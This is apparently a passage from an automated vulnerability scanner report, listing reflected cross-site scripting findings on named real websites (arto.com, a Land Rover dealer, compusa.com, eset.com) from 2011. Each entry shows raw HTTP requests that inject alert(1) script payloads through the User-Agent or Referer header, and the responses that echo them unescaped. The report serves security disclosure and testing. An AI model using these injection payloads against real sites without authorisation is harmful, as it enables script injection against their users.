var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...
4.248. http://www.arto.com/section/linkshare/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/linkshare/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc373"><script>alert(1)</script>717b898a5ba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /section/linkshare/ HTTP/1.1
Host: www.arto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dc373"><script>alert(1)</script>717b898a5ba
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vk3qrvl2i3b2gcvub5mipplt; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:21:03 GMT
Connection: close
Content-Length: 40025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dc373"><script>alert(1)</script>717b898a5ba" />
...[SNIP]...
4.249. http://www.arto.com/section/user/login/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/user/login/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9921f"><script>alert(1)</script>6df948c2fd9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /section/user/login/?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx HTTP/1.1
Host: www.arto.com
Proxy-Connection: keep-alive
Referer: http://burp/show/53
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.169921f"><script>alert(1)</script>6df948c2fd9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0cj2vqxnas50saq4rab4bmqt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 15:00:58 GMT
Content-Length: 40005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.169921f"><script>alert(1)</script>6df948c2fd9" />
...[SNIP]...
4.250. http://www.automasterlandrover.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba8b"><script>alert(1)</script>c5f2daa69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.automasterlandrover.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4ba8b"><script>alert(1)</script>c5f2daa69

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:21:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d606fa404638d9008b915da9d34eb2;path=/
Set-Cookie: JSESSIONID=1o9ay8sxhs37r;path=/
Set-Cookie: ddcpoolid=CmsPoolN;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43184

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=4ba8b"><script>alert(1)</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/index.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=
...[SNIP]...
4.251. http://www.automasterlandrover.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5183d'-alert(1)-'57160338b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.automasterlandrover.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5183d'-alert(1)-'57160338b5

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:21:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d60b7e404638d9008b915d7c8aee19;path=/
Set-Cookie: JSESSIONID=6u915eujlgvi1;path=/
Set-Cookie: ddcpoolid=CmsPoolN;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=5183d'-alert(1)-'57160338b5',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.252. http://www.compusa.com/applications/SearchTools/search.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /applications/SearchTools/search.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f0c0c--><script>alert(1)</script>ab07c28887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /applications/SearchTools/search.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=71; path=/
Set-Cookie: SRVR=WEBX23%2D04A; path=/
Set-Cookie: Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ESYX+Venture+VX9+Series+Custom+Desktop+PC%3E%3EEdpNo%3D5688178%5ED%3E%3EGarmin+Nuvi+1490T+5%22+GPS+w%2FTraffic%2FBT+%2D+RB%3E%3EEdpNo%3D5589658%5ED%3E%3EFantom+2TB+G%2DForce+External+Hard+Drive%3E%3EEdpNo%3D5384378&Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2FSearchTools%2Ffailedsearch%2Easp%3Fkeywords%3D&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Df0c0c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eab07c28887&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=1127875020110417102130173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Content-Length: 112869


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="CompUSA.com is your complete online headquarters for computer products at
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887-->
...[SNIP]...
4.253. http://www.compusa.com/cgi-bin/order.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 24a87--><script>alert(1)</script>ec22dac0bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=A&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=63; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=3626439220110417102129173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eec22dac0bbf&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX22%2D01A; path=/
Content-Length: 79761


<!--v1-->
<!--Domain :: compusa.com-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.compusa.com-->
<!--ContinueShoppingURL :: /applications/searchtools/item-details
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf-->
...[SNIP]...
4.254. http://www.eset.com/online-scanner [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5b9c"-alert(1)-"b05d62e2351 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=l77gn0qk2vii6glnvvfjiehd24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:02 GMT
X-Varnish: 1857986357
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.255. http://www.eset.com/online-scanner/help [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/help

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79440"-alert(1)-"b598b50e2ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner/help HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13150
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168923
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.256. http://www.eset.com/online-scanner/run [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 745d9"-alert(1)-"b96c10ee407 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:41 GMT
X-Varnish: 1857996770
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.257. http://www.eset.com/purchase [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /purchase

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e22"-alert(1)-"2096f355350 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /purchase HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:52 GMT
X-Varnish: 1858169586
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.258. http://www.eset.com/us [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a252f"-alert(1)-"980a35ca14f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f

Response (redirected)

